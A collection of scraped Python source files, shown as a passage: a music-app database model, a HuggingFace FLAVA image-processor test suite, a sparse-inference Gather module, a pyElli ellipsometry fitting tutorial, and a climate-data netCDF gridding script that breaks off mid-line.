import func\n\n\nclass Song(db.Model):\n __tablename__ = 'songs'\n\n id = db.Column(db.Integer, primary_key=True, nullable=False)\n title = db.Column(db.String(40), nullable=False)\n file_url = db.Column(db.String(500))\n song_img = db.Column(db.String(255))\n musician_id = db.Column(db.Integer, db.ForeignKey('musicians.id'))\n created_at = db.Column(db.DateTime(timezone=True),\n nullable=False, server_default=func.now())\n updated_at = db.Column(db.DateTime(timezone=True),\n nullable=False, server_default=func.now())\n\n musicians = db.relationship('Musician', back_populates='songs')\n comments = db.relationship('Comment', back_populates='songs')\n\n def to_dict(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'file_url': self.file_url,\n 'song_img': self.song_img,\n 'musician_id': self.musician_id,\n 'created_at': self.created_at,\n 'updated_at': self.updated_at,\n }\n","repo_name":"brancifortnick/medley-sesh","sub_path":"app/models/song.py","file_name":"song.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"28705398404","text":"import random\nimport unittest\n\nimport numpy as np\n\nfrom transformers.testing_utils import require_torch, require_vision\nfrom transformers.utils import is_torch_available, is_vision_available\n\nfrom ...test_image_processing_common import ImageProcessingTestMixin, prepare_image_inputs\n\n\nif is_torch_available():\n import torch\n\nif is_vision_available():\n import PIL\n\n from transformers import FlavaImageProcessor\n from transformers.image_utils import PILImageResampling\n from transformers.models.flava.image_processing_flava import (\n FLAVA_CODEBOOK_MEAN,\n FLAVA_CODEBOOK_STD,\n FLAVA_IMAGE_MEAN,\n FLAVA_IMAGE_STD,\n )\nelse:\n FLAVA_IMAGE_MEAN = FLAVA_IMAGE_STD = FLAVA_CODEBOOK_MEAN = FLAVA_CODEBOOK_STD = None\n\n\nclass FlavaImageProcessingTester(unittest.TestCase):\n def __init__(\n self,\n parent,\n batch_size=7,\n num_channels=3,\n min_resolution=30,\n max_resolution=400,\n do_resize=True,\n size=None,\n do_center_crop=True,\n crop_size=None,\n resample=None,\n do_rescale=True,\n rescale_factor=1 / 255,\n do_normalize=True,\n image_mean=FLAVA_IMAGE_MEAN,\n image_std=FLAVA_IMAGE_STD,\n input_size_patches=14,\n total_mask_patches=75,\n mask_group_max_patches=None,\n mask_group_min_patches=16,\n mask_group_min_aspect_ratio=0.3,\n mask_group_max_aspect_ratio=None,\n codebook_do_resize=True,\n codebook_size=None,\n codebook_resample=None,\n codebook_do_center_crop=True,\n codebook_crop_size=None,\n codebook_do_map_pixels=True,\n codebook_do_normalize=True,\n codebook_image_mean=FLAVA_CODEBOOK_MEAN,\n codebook_image_std=FLAVA_CODEBOOK_STD,\n ):\n size = size if size is not None else {\"height\": 224, \"width\": 224}\n crop_size = crop_size if crop_size is not None else {\"height\": 224, \"width\": 224}\n codebook_size = codebook_size if codebook_size is not None else {\"height\": 112, \"width\": 112}\n codebook_crop_size = codebook_crop_size if codebook_crop_size is not None else {\"height\": 112, \"width\": 112}\n\n self.parent = parent\n self.batch_size = batch_size\n self.num_channels = num_channels\n self.do_resize = do_resize\n self.do_rescale = do_rescale\n self.rescale_factor = rescale_factor\n self.min_resolution = min_resolution\n self.max_resolution = max_resolution\n self.size = size\n self.resample = resample if resample is not None else PILImageResampling.BICUBIC\n self.do_normalize = do_normalize\n self.image_mean = image_mean\n self.image_std = image_std\n self.do_center_crop = do_center_crop\n self.crop_size = crop_size\n\n self.input_size_patches = input_size_patches\n self.total_mask_patches = total_mask_patches\n self.mask_group_max_patches = mask_group_max_patches\n self.mask_group_min_patches = mask_group_min_patches\n self.mask_group_min_aspect_ratio = mask_group_min_aspect_ratio\n self.mask_group_max_aspect_ratio = mask_group_max_aspect_ratio\n\n self.codebook_do_resize = codebook_do_resize\n self.codebook_size = codebook_size\n self.codebook_resample = codebook_resample if codebook_resample is not None else PILImageResampling.LANCZOS\n self.codebook_do_center_crop = codebook_do_center_crop\n self.codebook_crop_size = codebook_crop_size\n self.codebook_do_map_pixels = codebook_do_map_pixels\n self.codebook_do_normalize = codebook_do_normalize\n self.codebook_image_mean = codebook_image_mean\n self.codebook_image_std = codebook_image_std\n\n def prepare_image_processor_dict(self):\n return {\n \"image_mean\": self.image_mean,\n \"image_std\": self.image_std,\n \"do_normalize\": self.do_normalize,\n \"do_resize\": self.do_resize,\n \"size\": self.size,\n \"resample\": self.resample,\n \"do_rescale\": self.do_rescale,\n \"rescale_factor\": self.rescale_factor,\n \"do_center_crop\": self.do_center_crop,\n \"crop_size\": self.crop_size,\n \"input_size_patches\": self.input_size_patches,\n \"total_mask_patches\": self.total_mask_patches,\n \"mask_group_max_patches\": self.mask_group_max_patches,\n \"mask_group_min_patches\": self.mask_group_min_patches,\n \"mask_group_min_aspect_ratio\": self.mask_group_min_aspect_ratio,\n \"mask_group_max_aspect_ratio\": self.mask_group_min_aspect_ratio,\n \"codebook_do_resize\": self.codebook_do_resize,\n \"codebook_size\": self.codebook_size,\n \"codebook_resample\": self.codebook_resample,\n \"codebook_do_center_crop\": self.codebook_do_center_crop,\n \"codebook_crop_size\": self.codebook_crop_size,\n \"codebook_do_map_pixels\": self.codebook_do_map_pixels,\n \"codebook_do_normalize\": self.codebook_do_normalize,\n \"codebook_image_mean\": self.codebook_image_mean,\n \"codebook_image_std\": self.codebook_image_std,\n }\n\n def get_expected_image_size(self):\n return (self.size[\"height\"], self.size[\"width\"])\n\n def get_expected_mask_size(self):\n return (\n (self.input_size_patches, self.input_size_patches)\n if not isinstance(self.input_size_patches, tuple)\n else self.input_size_patches\n )\n\n def get_expected_codebook_image_size(self):\n return (self.codebook_size[\"height\"], self.codebook_size[\"width\"])\n\n def prepare_image_inputs(self, equal_resolution=False, numpify=False, torchify=False):\n return prepare_image_inputs(\n batch_size=self.batch_size,\n num_channels=self.num_channels,\n min_resolution=self.min_resolution,\n max_resolution=self.max_resolution,\n equal_resolution=equal_resolution,\n numpify=numpify,\n torchify=torchify,\n )\n\n\n@require_torch\n@require_vision\nclass FlavaImageProcessingTest(ImageProcessingTestMixin, unittest.TestCase):\n image_processing_class = FlavaImageProcessor if is_vision_available() else None\n maxDiff = None\n\n def setUp(self):\n self.image_processor_tester = FlavaImageProcessingTester(self)\n\n @property\n def image_processor_dict(self):\n return self.image_processor_tester.prepare_image_processor_dict()\n\n def test_image_processor_properties(self):\n image_processing = self.image_processing_class(**self.image_processor_dict)\n self.assertTrue(hasattr(image_processing, \"image_mean\"))\n self.assertTrue(hasattr(image_processing, \"image_std\"))\n self.assertTrue(hasattr(image_processing, \"do_normalize\"))\n self.assertTrue(hasattr(image_processing, \"do_resize\"))\n self.assertTrue(hasattr(image_processing, \"resample\"))\n self.assertTrue(hasattr(image_processing, \"crop_size\"))\n self.assertTrue(hasattr(image_processing, \"do_center_crop\"))\n self.assertTrue(hasattr(image_processing, \"do_rescale\"))\n self.assertTrue(hasattr(image_processing, \"rescale_factor\"))\n self.assertTrue(hasattr(image_processing, \"masking_generator\"))\n self.assertTrue(hasattr(image_processing, \"codebook_do_resize\"))\n self.assertTrue(hasattr(image_processing, \"codebook_size\"))\n self.assertTrue(hasattr(image_processing, \"codebook_resample\"))\n self.assertTrue(hasattr(image_processing, \"codebook_do_center_crop\"))\n self.assertTrue(hasattr(image_processing, \"codebook_crop_size\"))\n self.assertTrue(hasattr(image_processing, \"codebook_do_map_pixels\"))\n self.assertTrue(hasattr(image_processing, \"codebook_do_normalize\"))\n self.assertTrue(hasattr(image_processing, \"codebook_image_mean\"))\n self.assertTrue(hasattr(image_processing, \"codebook_image_std\"))\n\n def test_image_processor_from_dict_with_kwargs(self):\n image_processor = self.image_processing_class.from_dict(self.image_processor_dict)\n self.assertEqual(image_processor.size, {\"height\": 224, \"width\": 224})\n self.assertEqual(image_processor.crop_size, {\"height\": 224, \"width\": 224})\n self.assertEqual(image_processor.codebook_size, {\"height\": 112, \"width\": 112})\n self.assertEqual(image_processor.codebook_crop_size, {\"height\": 112, \"width\": 112})\n\n image_processor = self.image_processing_class.from_dict(\n self.image_processor_dict, size=42, crop_size=84, codebook_size=33, codebook_crop_size=66\n )\n self.assertEqual(image_processor.size, {\"height\": 42, \"width\": 42})\n self.assertEqual(image_processor.crop_size, {\"height\": 84, \"width\": 84})\n self.assertEqual(image_processor.codebook_size, {\"height\": 33, \"width\": 33})\n self.assertEqual(image_processor.codebook_crop_size, {\"height\": 66, \"width\": 66})\n\n def test_call_pil(self):\n # Initialize image_processing\n image_processing = self.image_processing_class(**self.image_processor_dict)\n # create random PIL images\n image_inputs = self.image_processor_tester.prepare_image_inputs(equal_resolution=False)\n for image in image_inputs:\n self.assertIsInstance(image, PIL.Image.Image)\n\n # Test not batched input\n encoded_images = image_processing(image_inputs[0], return_tensors=\"pt\")\n\n # Test no bool masked pos\n self.assertFalse(\"bool_masked_pos\" in encoded_images)\n\n expected_height, expected_width = self.image_processor_tester.get_expected_image_size()\n\n self.assertEqual(\n encoded_images.pixel_values.shape,\n (1, self.image_processor_tester.num_channels, expected_height, expected_width),\n )\n\n # Test batched\n encoded_images = image_processing(image_inputs, return_tensors=\"pt\")\n expected_height, expected_width = self.image_processor_tester.get_expected_image_size()\n\n # Test no bool masked pos\n self.assertFalse(\"bool_masked_pos\" in encoded_images)\n\n self.assertEqual(\n encoded_images.pixel_values.shape,\n (\n self.image_processor_tester.batch_size,\n self.image_processor_tester.num_channels,\n expected_height,\n expected_width,\n ),\n )\n\n def _test_call_framework(self, instance_class, prepare_kwargs):\n # Initialize image_processing\n image_processing = self.image_processing_class(**self.image_processor_dict)\n # create random tensors\n image_inputs = self.image_processor_tester.prepare_image_inputs(equal_resolution=False, **prepare_kwargs)\n for image in image_inputs:\n self.assertIsInstance(image, instance_class)\n\n # Test not batched input\n encoded_images = image_processing(image_inputs[0], return_tensors=\"pt\")\n\n expected_height, expected_width = self.image_processor_tester.get_expected_image_size()\n self.assertEqual(\n encoded_images.pixel_values.shape,\n (1, self.image_processor_tester.num_channels, expected_height, expected_width),\n )\n\n encoded_images = image_processing(image_inputs, return_image_mask=True, return_tensors=\"pt\")\n\n expected_height, expected_width = self.image_processor_tester.get_expected_image_size()\n self.assertEqual(\n encoded_images.pixel_values.shape,\n (\n self.image_processor_tester.batch_size,\n self.image_processor_tester.num_channels,\n expected_height,\n expected_width,\n ),\n )\n\n expected_height, expected_width = self.image_processor_tester.get_expected_mask_size()\n self.assertEqual(\n encoded_images.bool_masked_pos.shape,\n (\n self.image_processor_tester.batch_size,\n expected_height,\n expected_width,\n ),\n )\n\n # Test batched\n encoded_images = image_processing(image_inputs, return_tensors=\"pt\").pixel_values\n\n expected_height, expected_width = self.image_processor_tester.get_expected_image_size()\n self.assertEqual(\n encoded_images.shape,\n (\n self.image_processor_tester.batch_size,\n self.image_processor_tester.num_channels,\n expected_height,\n expected_width,\n ),\n )\n\n # Test masking\n encoded_images = image_processing(image_inputs, return_image_mask=True, return_tensors=\"pt\")\n\n expected_height, expected_width = self.image_processor_tester.get_expected_image_size()\n self.assertEqual(\n encoded_images.pixel_values.shape,\n (\n self.image_processor_tester.batch_size,\n self.image_processor_tester.num_channels,\n expected_height,\n expected_width,\n ),\n )\n\n expected_height, expected_width = self.image_processor_tester.get_expected_mask_size()\n self.assertEqual(\n encoded_images.bool_masked_pos.shape,\n (\n self.image_processor_tester.batch_size,\n expected_height,\n expected_width,\n ),\n )\n\n def test_call_numpy(self):\n self._test_call_framework(np.ndarray, prepare_kwargs={\"numpify\": True})\n\n def test_call_numpy_4_channels(self):\n self.image_processing_class.num_channels = 4\n self._test_call_framework(np.ndarray, prepare_kwargs={\"numpify\": True})\n self.image_processing_class.num_channels = 3\n\n def test_call_pytorch(self):\n self._test_call_framework(torch.Tensor, prepare_kwargs={\"torchify\": True})\n\n def test_masking(self):\n # Initialize image_processing\n random.seed(1234)\n image_processing = self.image_processing_class(**self.image_processor_dict)\n image_inputs = self.image_processor_tester.prepare_image_inputs(equal_resolution=False, torchify=True)\n\n # Test not batched input\n encoded_images = image_processing(image_inputs[0], return_image_mask=True, return_tensors=\"pt\")\n self.assertEqual(encoded_images.bool_masked_pos.sum().item(), 75)\n\n def test_codebook_pixels(self):\n # Initialize image_processing\n image_processing = self.image_processing_class(**self.image_processor_dict)\n # create random PIL images\n image_inputs = self.image_processor_tester.prepare_image_inputs(equal_resolution=False)\n for image in image_inputs:\n self.assertIsInstance(image, PIL.Image.Image)\n\n # Test not batched input\n encoded_images = image_processing(image_inputs[0], return_codebook_pixels=True, return_tensors=\"pt\")\n expected_height, expected_width = self.image_processor_tester.get_expected_codebook_image_size()\n self.assertEqual(\n encoded_images.codebook_pixel_values.shape,\n (1, self.image_processor_tester.num_channels, expected_height, expected_width),\n )\n\n # Test batched\n encoded_images = image_processing(image_inputs, return_codebook_pixels=True, return_tensors=\"pt\")\n expected_height, expected_width = self.image_processor_tester.get_expected_codebook_image_size()\n self.assertEqual(\n encoded_images.codebook_pixel_values.shape,\n (\n self.image_processor_tester.batch_size,\n self.image_processor_tester.num_channels,\n expected_height,\n expected_width,\n ),\n )\n","repo_name":"huggingface/transformers","sub_path":"tests/models/flava/test_image_processing_flava.py","file_name":"test_image_processing_flava.py","file_ext":"py","file_size_in_byte":15669,"program_lang":"python","lang":"en","doc_type":"code","stars":115573,"dataset":"github-code","pt":"85"} +{"seq_id":"13738953870","text":"import warnings\nfrom typing import Dict, Optional, Tuple, Union\n\nimport torch\nfrom torch import nn\n\nfrom sige.utils import reduce_mask\nfrom .base import SIGEModule\nfrom .utils import activation\n\n\nclass Gather(SIGEModule):\n def __init__(\n self,\n conv: nn.Conv2d,\n block_size: Union[int, Tuple[int, int]],\n offset: Optional[Union[int, Tuple[int, int]]] = None,\n activation_name: str = \"identity\",\n activation_first: bool = False,\n verbose: bool = False,\n ):\n super(Gather, self).__init__()\n if isinstance(block_size, int):\n block_size = (block_size, block_size)\n\n n0 = max(block_size[0] - conv.kernel_size[0], 0) // conv.stride[0]\n n1 = max(block_size[1] - conv.kernel_size[1], 0) // conv.stride[1]\n b0 = n0 * conv.stride[0] + conv.kernel_size[0]\n b1 = n1 * conv.stride[1] + conv.kernel_size[1]\n if (b0, b1) != block_size:\n warnings.warn(\"Change the block size from (%d, %d) to (%d, %d)\" % (*block_size, b0, b1))\n\n self.model_stride = conv.stride\n self.kernel_size = conv.kernel_size\n\n self.block_size = (b0, b1)\n self.block_stride = ((n0 + 1) * conv.stride[0], (n1 + 1) * conv.stride[1])\n if offset is None:\n self.offset = conv.padding\n else:\n if isinstance(offset, int):\n offset = (offset, offset)\n self.offset = offset\n self.activation_name = activation_name\n self.activation_first = activation_first\n self.verbose = verbose\n\n self.load_runtime(\"gather\")\n\n self.input_res: Optional[Tuple[int, int]] = None\n self.active_indices: Optional[torch.Tensor] = None\n\n def forward(\n self, x: torch.Tensor, scale: Optional[torch.Tensor] = None, shift: Optional[torch.Tensor] = None\n ) -> torch.Tensor:\n self.check_dtype(x, scale, shift)\n self.check_dim(x, scale, shift)\n b, c, h, w = x.shape\n if self.mode == \"profile\":\n output = torch.full(\n (b * self.active_indices.size(0), c, *self.block_size),\n fill_value=x[0, 0, 0, 0],\n dtype=x.dtype,\n device=x.device,\n ) # create a dummy gather output depending on the input for profiling\n if scale is not None:\n output = output * scale[0, 0, 0, 0]\n if shift is not None:\n output = output + shift[0, 0, 0, 0]\n output = activation(output, self.activation_name)\n elif self.mode == \"full\":\n self.input_res = x.shape[2:]\n assert scale is None\n assert shift is None\n output = x\n elif self.mode == \"sparse\":\n device = x.device.type\n runtime = self.runtime[device]\n assert runtime is not None\n output = runtime(\n x.contiguous(),\n self.block_size[0],\n self.block_size[1],\n self.active_indices.contiguous(),\n None if scale is None else scale.contiguous(),\n None if shift is None else shift.contiguous(),\n self.activation_name,\n self.activation_first,\n )\n else:\n raise NotImplementedError(\"Unknown mode: [%s]!!!\" % self.mode)\n return output\n\n def set_mask(self, masks: Dict, cache: Dict, timestamp: int):\n if self.timestamp != timestamp:\n super(Gather, self).set_mask(masks, cache, timestamp)\n assert self.input_res is not None\n res = tuple(self.input_res)\n mask = masks[res]\n self.mask = mask\n key = (\"active_indices\", *res, *self.block_size, *self.block_stride, *self.offset)\n active_indices = cache.get(key, None)\n if active_indices is None:\n active_indices = reduce_mask(\n mask, self.block_size, self.block_stride, self.offset, verbose=self.verbose\n )\n cache[key] = active_indices\n self.active_indices = active_indices\n","repo_name":"lmxyy/sige","sub_path":"sige/nn/gather.py","file_name":"gather.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","stars":235,"dataset":"github-code","pt":"85"} +{"seq_id":"38710990685","text":"\"\"\"\nBasic usage\n===========\n\nBasic usage of building a model and fitting it to measurement data of SiO2 on Si.\n\n\"\"\"\n# %%\nimport elli\nfrom elli.fitting import ParamsHist, fit\n\n# sphinx_gallery_thumbnail_path = '_static/basic_usage.png'\n\n\n# %%\n# Reading data\n# ------------------------\n#\n# We load the data from the generated\n# `NeXus file `_\n# and select the angle we want to analyse.\n# You may set the ANGLE constant to 50 or 60 to select\n# other angles of incidence from the example file.\n# Additionally, we're cutting the wavelength axis to be in between 210 nm and 800 nm.\n# This is because we're using literature values for Si,\n# which are only defined in this wavelength range.\nANGLE = 70\npsi_delta = elli.read_nexus_psi_delta(\"SiO2onSi.ellips.nxs\").loc[ANGLE][210:800]\n\n# %%\n# Setting parameters\n# ------------------------\n#\n# As an example we analyse an oxidation layer of SiO2 on Si.\n# Prior to defining our model, we have to set the parameters we want to use.\n# We're going to use a :ref:`Cauchy model ` for SiO2 and load the Si values from\n# `literature values `_.\n# The parameter names can be choosen freely,\n# but you have to use the exact same name in the later model definition.\n# The package uses lmfit as fitting tool and you may refer to their\n# `documentation `_\n# for details on parameter definition.\n\nparams = ParamsHist()\nparams.add(\"SiO2_n0\", value=1.452, min=-100, max=100, vary=False)\nparams.add(\"SiO2_n1\", value=36.0, min=-40000, max=40000, vary=False)\nparams.add(\"SiO2_n2\", value=0, min=-40000, max=40000, vary=False)\nparams.add(\"SiO2_k0\", value=0, min=-100, max=100, vary=False)\nparams.add(\"SiO2_k1\", value=0, min=-40000, max=40000, vary=False)\nparams.add(\"SiO2_k2\", value=0, min=-40000, max=40000, vary=False)\nparams.add(\"SiO2_d\", value=20, min=0, max=40000, vary=True)\n\n# %%\n# Load silicon dispersion from the refractiveindexinfo database\n# -------------------------------------------------------------\n# You can load any material from the index\n# `refractiveindex.info `__, which is\n# embedded into the software (so you may use it offline, too). Here, we\n# are interested in the literature values for the silicon substrate.\n# First we need to load the database with ``rii_db = elli.db.RII()`` and\n# then we can query it with ``rii_db.get_mat(\"Si\", \"Aspnes\")`` to load\n# this\n# `entry `__.\nrii_db = elli.db.RII()\nSi = rii_db.get_mat(\"Si\", \"Aspnes\")\n\n\n# %%\n# Building the model\n# ------------------------\n#\n# For simple parameter estimation,\n# the fit decorator (**@fit**) in conjuction with the model definition is used.\n# The fitting decorator takes a pandas dataframe containing\n# the psi/delta measurement data (**psi_delta**) and the model parameters (**params**) as an input.\n# It then passes the wavelength from measurement dataframe (**lbda**)\n# and the parameters to the actual model function.\n#\n# Inside the model function the optical model is built,\n# i.e. the Si literature values are loaded\n# and the fitting parameters are filled into the Cauchy dispersion.\n# For details on how to insert data into the Cauchy model or other optical dispersion models,\n# you may refer to the documentation of pyElli.\n# Please keep in mind that the parameters you use here\n# have to be defined in the parameter object **param**.\n#\n# From the dispersion model isotropic materials are generated\n# (could also be an anisotropic material, refer to the docs for an overview).\n# This is done by calling the :code:`elli.IsotropicMaterial(...)` function\n# with a dispersion model as a parameter\n# or simply calling :code:`.get_mat()` on a dispersion model.\n# These two approaches are equivalent.From these materials the layer is build,\n# which only consists of the SiO2 layer in this example.\n# The final structure consists of an incoming half-space,\n# the layers and an outgoing half space. Specifically,\n# typically the light is coming from air and finally gets absorbed by the bulk material,\n# in our example this is Si, i.e. we call :code:`elli.Structure(elli.AIR, Layer, Si)`.\n#\n# To provide simulated data, we have to evaluate the structure\n# by calling the :code:`evaluate(...)` function,\n# which takes the experimental wavelength array **lbda**, **ANGLE** under which the experiment\n# was performed and the solver to be used to solve the transfer-matrix problem.\n# Here, we use a simple 2x2 matrix approach,\n# which splits the interaction in s and p-parts and therefore cannot account for anisotropy.\n# There exist 4x4 matrix solvers as well.\n# You may refer to the :ref:`solver documentation ` for further details.\n#\n# Executing the cell below in a jupyter notebook displays a comparison of the simulated Ψ / Δ values\n# at the current parameter values with their measured counterparts.\n# Additionally, input fields for each model parameter are shown.\n# You may change the parameters and the calcualted data will change accordingly.\n# For clarification the modeled data is shown with `_calc` postfix in the legend.\n@fit(psi_delta, params)\ndef model(lbda, params):\n # Generate the cauchy model from the current lmfit parameters\n SiO2 = elli.Cauchy(\n params[\"SiO2_n0\"],\n params[\"SiO2_n1\"],\n params[\"SiO2_n2\"],\n params[\"SiO2_k0\"],\n params[\"SiO2_k1\"],\n params[\"SiO2_k2\"],\n ).get_mat()\n # get_mat() generates an IsotropicMaterial from the dispersion relation\n\n # Construct the layers you expect in your sample\n # Here, it only consists of one layer SiO2 in between air and Si.\n # We build the structure coming from air, through the layers,\n # represented as an array, and having Si as bulk material.\n structure = elli.Structure(\n elli.AIR, # Input medium\n [elli.Layer(SiO2, params[\"SiO2_d\"])], # Overlayer structure\n Si,\n ) # Output medium / Substrate\n\n # The model should return the evaluation of the structure at the experimental wavelengths lbda,\n # the experimental angle ANGLE and it should define a solver to calculate the transfer matrix.\n return structure.evaluate(lbda, ANGLE, solver=elli.Solver2x2)\n\n\n# %%\n# Fit and plot fit results\n# ------------------------\n#\n# The fit of the data can be executed by calling the fit() function on the model function,\n# which automatically gets attached by the @fit decorator in the cell above.\n# The following cell basically executes the fit and plots\n# a comparison between the measurement and fitted data.\nfit_stats = model.fit()\nmodel.plot()\n\n# %%\n# Extracting the optical properties from the fit\n# ----------------------------------------------\n#\n# Since we want to extract the dispersion relation of a layer in our measured stack,\n# we can use our fitted parameters.\n# The fit parameters are contained in the fits output :code:`params` attribute,\n# i.e. :code:`fit_stats.params` for our example.\n# We can use it to call our dispersion relation we used in our model\n# (here it is a Cauchy dispersion relation)\n# and fill in our fitted value.\n# By calling :code:`get_dielectric_df()` we can get the dielectric function of the material,\n# which is plotted here as an example. :code:`get_dielectric_df` uses a default wavelength range\n# which can also be changed by inputting a wavelength array as a parameter.\nfitted_model = elli.Cauchy(\n fit_stats.params[\"SiO2_n0\"],\n fit_stats.params[\"SiO2_n1\"],\n fit_stats.params[\"SiO2_n2\"],\n fit_stats.params[\"SiO2_k0\"],\n fit_stats.params[\"SiO2_k1\"],\n fit_stats.params[\"SiO2_k2\"],\n)\n\nfitted_model.get_dielectric_df().plot(backend=\"plotly\")\n\n# %%\n# We can also call :code:`get_refractive_index_df()`\n# to get the refractive index of the material as dataframe.\nfitted_model.get_refractive_index_df().plot(backend=\"plotly\")\n\n# %%\n# If you want to write your data to a file you simply call pandas :code:`to_csv(...)`\n# function to write a csv file, i.e. for the dielectric function this writes as\nfitted_model.get_dielectric_df().to_csv(\"SiO2_diel_func.csv\")\n\n# %%\n# You may also access a single value of your optical model\nfit_stats.params[\"SiO2_n0\"].value\n\n# %%\n# Our simply print the fitted values in a list together with their fitting errors\nfit_stats.params\n\n# %%\n# Show fit statistics\n# --------------------\n# Now, we may also print out the fit statictics from the model fit in the cell above.\n# The fit statistics are simple `lmfit fit statistics `_, too.\n# Typically, one uses chi square values as a figure of merit for the fit quality.\n# It is stored in the chisqr attribute of the fit_stats variable we defined above.\nfit_stats.chisqr\n\n# %%\n# We can print the full fit statistics, too.\nfit_stats\n\n# %%\n# References\n# ----------\n# `Here `_\n# you can find the latest jupyter notebook and data files of this example.\n","repo_name":"PyEllips/pyElli","sub_path":"examples/gallery/plot_01_basic_usage.py","file_name":"plot_01_basic_usage.py","file_ext":"py","file_size_in_byte":9119,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"85"} +{"seq_id":"31173263682","text":"B\"\"\" Create a single netCDF file contaning gridded data.\n structure of file:\n - dimensions\n lat\n lon\n time\n pleve\n\"\"\"\n\nimport os,sys\n\nimport xarray as xr\nimport numpy as np\nimport pandas as pd\n\n\n\ndef initialize(variable = '' ):\n \n global Lat, Lon, Plev, Hour, Time, files, gridded_files_dir, hours, var, out_dir\n \n var = variable\n out_dir = '/raid60/scratch/federico/GRIDDED_FILES_FEB2021/'\n \n \"\"\" Directory with gridded files, list of files \"\"\"\n \n gridded_files_dir = '/raid60/scratch/federico/GRIDDED_FILES_FEB2021/' + var + '/'\n \n \n files = os.listdir(gridded_files_dir)\n \n \"\"\" Creating the latitude and longitude lists \"\"\"\n lat = list(set( [ float(f.split('_')[5]) for f in os.listdir(gridded_files_dir) ] ) ) \n lat.sort()\n lon = list(set( [ float(f.split('_')[6]) for f in os.listdir(gridded_files_dir) ] ) ) \n lon.sort()\n \n \n Lat = np.array(lat)\n Lon = np.array(lon)\n Plev = np.array([1000, 2000, 3000, 5000, 7000, 10000, 15000, 20000, 25000, 30000, 40000, 50000, 70000, 85000, 92500, 100000])\n Hour = np.array([0,12])\n \n \"\"\" Creating hour array (easier to find time in the df ) \"\"\"\n df = xr.open_dataset( gridded_files_dir + '/' + files[0] , engine = 'h5netcdf', decode_times = True ).to_dataframe()\n q = pd.arrays.DatetimeArray( df['time'][:] )\n hours = q.hour\n df['hour'] = hours\n \n \"\"\" Total length of data \"\"\"\n Time = df.loc [ (df['hour'] == 12) & (df['plev']==100000) ]['time'].values # just need one plev per hour, i.e. this is the list of distinct time stamps\n Time = pd.arrays.DatetimeArray(Time)\n Time = Time.date\n Time = Time.astype(np.datetime64)\n print('*** Finished initialization ***')\n\n\n#Lat = Lat[:3]\n#Lon = Lon[:5]\n\ndef make_xarray():\n res_average = np.empty([len(Lat) , len(Lon), len(Hour) , len(Plev), len(Time) ] ) # 2*16 is 2 hours x pressure levels , empty placeholder \n res_anomaly = np.empty([len(Lat) , len(Lon), len(Hour) , len(Plev), len(Time) ] ) # 2*16 is 2 hours x pressure levels , empty placeholder \n \n #for lat in range(len(Lat)):\n # for lon in range(len(Lon)):\n for lat in Lat:\n for lon in Lon:\n box_file = [f for f in files if '_' + str(lat) +'_'+str(lon) in f ][0] # search for the grid file for those lat and lon \n print(lat , ' ' , lon , ' ' , box_file )\n \n #if '24_20_lat' in box_file:\n # print('check' , box_file )\n #else:\n # continue\n # print(0)\n df = xr.open_dataset( gridded_files_dir + '/' + box_file , engine = 'h5netcdf', decode_times = True ).to_dataframe()\n #q = pd.arrays.DatetimeArray( df['time'][:] )\n #hh = q.hour\n df['hour'] = hours # it is the same for each dataframe \n\n for p in range(len(Plev)):\n a = 0 # read here input data \n for h in range(len(Hour)):\n print('processing lat lon press hour : ', lat,lon,p,h)\n \n df_red = df.loc[ (df['plev'] == Plev[p] ) & ( df['hour'] == Hour[h] )]\n if var == 'ta':\n values = df_red[var + '_average_bias'].values\n ano = df_red[var + '_anomaly_bias'].values\n else:\n values = df_red[var + '_average'].values\n ano = df_red[var + '_anomaly'].values \n\n \n res_average[np.where(Lat == lat),np.where(Lon == lon),h,p,:] = values.astype(float)\n res_anomaly[np.where(Lat == lat),np.where(Lon == lon),h,p,:] = ano.astype(float)\n \n return res_average, res_anomaly\n\n\n\ndef write_gridded_netCDF(res_average, res_anomaly):\n \"\"\" Writing the output netCDF files using xarray \"\"\"\n da = xr.Dataset ( { var + '_average' : ( ['lat','lon','hour','pressure','time'] , res_average ), # variables \n var + '_anomaly' : ( ['lat','lon','hour','pressure','time'] , res_anomaly ) },\n \n coords = dict( lat = Lat ,\n lon = Lon,\n hour = Hour,\n pressure = Plev,\n time = Time, \n ),\n )\n \n da.attrs['title'] = 'CEUAS gridded data'\n da.attrs['institution'] = 'University of Vienna',\n da.attrs['source'] = 'Institut fuer Meteorologie und Geophysik, leopold.haimberger@univie.ac.at'\n \n \n attr_dic = { 'ta' : {'variable': 'Air temperature' , 'units': 'Kelvin [K]' },\n 'wind_speed' : {'variable': 'Wind speed' , 'units': 'meter per second [m/s]' },\n 'dew_point_temperature' : {'variable': 'Dew point temperature' , 'units': 'Kelvin [K]' },\n 'hur' : {'variable': 'Relative humidity' , 'units': 'unitless [0-1]' },\n 'hus' : {'variable': 'Specific humidity' , 'units': 'kilograms per kilogram\t[kg/kg]' },\n \n \n }\n \n\n da.attrs['variable'] = attr_dic[var]['variable']\n da.attrs['units'] = attr_dic[var]['units']\n \n da.lat.attrs['variable'] = 'Latitude'\n da.lat.attrs['units'] = 'Degrees'\n \n da.lon.attrs['variable'] = 'Longitude'\n da.lon.attrs['units'] = 'Degrees'\n \n da.time.attrs['variable'] = 'Timestamp'\n #da.time.attrs['units'] = 'Degrees'\n \n da.hour.attrs['variable'] = 'Hour'\n da.hour.attrs['units'] = 'Hour from 00'\n \n da.pressure.attrs['variable'] = 'Pressure'\n da.pressure.attrs['units'] = 'Pascal [Pa]'\n \n from datetime import datetime\n \n now = datetime.now()\n dt = now.strftime(\"%d/%m/%Y %H:%M:%S\")# dd/mm/YY H:M:S\n da.attrs['history'] = dt \n \n \"\"\" Setting the encoding for compression \"\"\"\n enc = {}\n for v in da:\n enc[v] = {'compression': 'gzip' }\n \n print(enc)\n da.to_netcdf( out_dir + '/CEUAS_' + var +'_gridded.nc' , format='netCDF4', engine='h5netcdf', encoding= enc )\n print('**Written file: ' , out_dir + '/CEUAS_' + var +'_gridded.nc *** ' )\n\n\n \n \n\"\"\" Select here the variable to process.\n Will locate the proper directory and file list \"\"\"\n\nvar = 'ta' # ta, dew_point_temperature, wind_speed, hur, hus \n#Lat = Lat[:3]\n#Lon = Lon[:5]\nif __name__ == '__main__':\n\n vars = 